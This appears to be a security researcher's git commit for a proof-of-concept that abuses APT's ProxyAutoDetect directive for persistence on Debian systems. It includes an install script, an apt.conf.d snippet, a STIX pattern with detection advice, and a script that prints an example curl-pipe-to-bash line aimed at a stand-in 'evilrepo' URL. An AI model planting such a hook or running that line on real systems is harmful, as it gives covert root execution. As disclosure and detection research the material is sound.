commit 1a9b47a7a21cf48ee7207f9d041ea98eeb46cf8c
Author: Phillip Tarrant <ptarrant@gmail.com>
Date:   Fri Jun 20 15:31:27 2025 +0000

    first commit

diff --git a/README.md b/README.md
new file mode 100644
index 0000000..352eefb
--- /dev/null
+++ b/README.md
@@ -0,0 +1,65 @@
+# APT ProxyAutoDetect Persistence (PoC)
+
+This repository demonstrates a technique for achieving execution and persistence by abusing an **undocumented feature** in the Advanced Packaging Tool (APT) on Debian-based Linux systems.
+
+---
+
+## 🔍 Technique Summary
+
+APT supports an undocumented config directive:
+
+    Acquire::http::ProxyAutoDetect "/absolute/path/to/binary";
+
+If placed in a file inside `/etc/apt/apt.conf.d/`, APT will execute the specified binary whenever it attempts to access an HTTP repository (e.g., during `apt update`, `apt install`, etc.).
+
+- `stdout` of the binary is treated as the proxy URL.
+- `stderr` is shown to the user but ignored.
+- No arguments are allowed — only absolute binary paths.
+
+---
+
+## 🎯 Use Cases
+
+- **Persistence**: Binary is run every time APT is used, including via automated scripts or cron.
+- **Execution**: Runs code covertly under a legitimate process tree (`apt` → custom binary).
+- **Defense Evasion**: Doesn’t rely on systemd, cron, or shell profile files.
+
+---
+
+## ⚙️ Demo Setup
+
+1. Install the config and script:
+
+    # This copies the config and shell script to /etc/apt/apt.conf.d/
+    ```
+    sudo ./install.sh
+    ```
+
+2. Run `apt update`:
+
+    ```
+    sudo apt update
+    ```
+
+---
+
+## 🧬 MITRE ATT&CK Mapping
+
+| Tactic          | Technique                                      |
+|-----------------|------------------------------------------------|
+| Persistence     | [T1546] Event Triggered Execution              |
+| Execution       | [T1546.008] Application Shimming (analogous)  |
+| Defense Evasion | [T1565.001] Stored Data Manipulation           |
+
+---
+
+## 📩 Disclosure
+
+This issue has been reported to the MITRE ATT&CK team for inclusion as a technique or sub-technique.
+
+---
+
+## 🔐 Author
+
+Phillip Tarrant  
+[https://www.linkedin.com/in/phillip-tarrant-cyber/](https://www.linkedin.com/in/phillip-tarrant-cyber/)
diff --git a/poc/30detectproxy b/poc/30detectproxy
new file mode 100644
index 0000000..67a4e06
--- /dev/null
+++ b/poc/30detectproxy
@@ -0,0 +1,2 @@
+// Demonstration of ProxyAutoDetect persistence
+Acquire::http::ProxyAutoDetect "/absolute/path/to/detect-http-proxy";
diff --git a/poc/detect-http-proxy b/poc/detect-http-proxy
new file mode 100644
index 0000000..e7eaf29
--- /dev/null
+++ b/poc/detect-http-proxy
@@ -0,0 +1,10 @@
+#!/bin/bash
+
+# This script is executed automatically by APT when Acquire::http::ProxyAutoDetect is configured.
+# It demonstrates how a threat actor could abuse this feature to execute arbitrary commands.
+
+echo "http://127.0.0.1:8888"  # stdout is interpreted as the proxy address
+
+# Simulated threat actor behavior
+echo "If I was a threat actor, I might do something like:" >&2
+echo "/usr/bin/curl -fsSk https://raw.githubusercontent.com/threatactor/evilrepo/main/install.sh | bash" >&2
\ No newline at end of file
diff --git a/poc/install.sh b/poc/install.sh
new file mode 100644
index 0000000..608864b
--- /dev/null
+++ b/poc/install.sh
@@ -0,0 +1,13 @@
+#!/bin/bash
+set -e
+
+BIN_PATH="$(pwd)/detect-http-proxy"
+CONF_PATH="/etc/apt/apt.conf.d/30detectproxy"
+
+echo "[*] Installing detect-http-proxy to ${BIN_PATH}"
+chmod +x detect-http-proxy
+
+echo "[*] Copying APT config to ${CONF_PATH}"
+sudo cp 30detectproxy $CONF_PATH
+
+echo "[*] Done. Now run: sudo apt update"
\ No newline at end of file
diff --git a/stix/apt-proxyautodetect-technique.json b/stix/apt-proxyautodetect-technique.json
new file mode 100644
index 0000000..3a64049
--- /dev/null
+++ b/stix/apt-proxyautodetect-technique.json
@@ -0,0 +1,26 @@
+{
+  "type": "attack-pattern",
+  "spec_version": "2.1",
+  "id": "attack-pattern--4cba5eeb-0031-47d3-9390-9f4fa6b57f88",
+  "created": "2025-06-20T00:00:00Z",
+  "modified": "2025-06-20T00:00:00Z",
+  "name": "APT ProxyAutoDetect Abuse for Execution",
+  "description": "Adversaries may abuse the undocumented Acquire::http::ProxyAutoDetect directive in APT by placing a config file that points to a local binary. This binary is executed whenever APT accesses an HTTP repository, allowing for stealthy persistence and execution.",
+  "x_mitre_platforms": ["Linux"],
+  "x_mitre_tactics": ["persistence", "execution", "defense-evasion"],
+  "x_mitre_permissions_required": ["root"],
+  "x_mitre_data_sources": [
+    "Process monitoring",
+    "File monitoring",
+    "Command execution"
+  ],
+  "kill_chain_phases": [
+    {
+      "kill_chain_name": "mitre-attack",
+      "phase_name": "persistence"
+    }
+  ],
+  "x_mitre_detection": "Monitor /etc/apt/apt.conf.d/ for unusual files. Look for Acquire::http::ProxyAutoDetect values pointing to local binaries. Detect apt-spawned processes that are not part of expected behavior.",
+  "x_mitre_version": "1.0",
+  "x_mitre_contributors": ["Phillip John Tarrant"]
+}